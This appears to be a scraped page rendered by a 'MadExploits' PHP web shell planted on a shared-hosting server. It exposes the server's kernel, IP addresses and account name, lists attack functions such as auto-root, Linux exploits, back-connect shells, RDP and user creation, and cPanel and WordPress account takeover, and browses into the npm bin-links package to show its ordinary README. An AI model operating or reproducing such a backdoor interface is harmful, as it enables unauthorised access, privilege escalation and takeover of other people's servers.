Linux host45.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 198.54.116.152 | : 216.73.216.115
Cant Read [ /etc/named.conf ]
8.1.32
bankpromax
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
node_modules /
npm /
node_modules /
bin-links /
[ HOME SHELL ]
Name
Size
Permission
Action
CHANGELOG.md
2.37
KB
-rw-r--r--
LICENSE
9.51
KB
-rw-r--r--
README.md
1.71
KB
-rw-r--r--
index.js
6.03
KB
-rw-r--r--
package.json
1.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# bin-links [](https://npm.im/bin-links) [](https://npm.im/bin-links) [](https://travis-ci.org/npm/bin-links) [](https://ci.appveyor.com/project/npm/bin-links) [](https://coveralls.io/github/npm/bin-links?branch=latest) [`bin-links`](https://github.com/npm/bin-links) is a standalone library that links binaries and man pages for Javascript packages ## Install `$ npm install bin-links` ## Table of Contents * [Example](#example) * [Features](#features) * [Contributing](#contributing) * [API](#api) * [`binLinks`](#binLinks) ### Example ```javascript // todo ``` ### Features * Links bin files listed under the `bin` property of pkg to the node_modules/.bin directory of the installing environment. * Links man files listed under the `man` property of pkg to the share/man directory of the provided optional directory prefix. ### Contributing The npm team enthusiastically welcomes contributions and project participation! There's a bunch of things you can do if you want to contribute! The [Contributor Guide](CONTRIBUTING.md) has all the information you need for everything from reporting bugs to contributing entire new features. Please don't hesitate to jump in if you'd like to, or even ask us questions if something isn't clear. ### API #### <a name="binLinks"></a> `> binLinks(pkg, folder, global, opts, cb)` ##### Example ```javascript binLinks(pkg, folder, global, opts, cb) ```
Close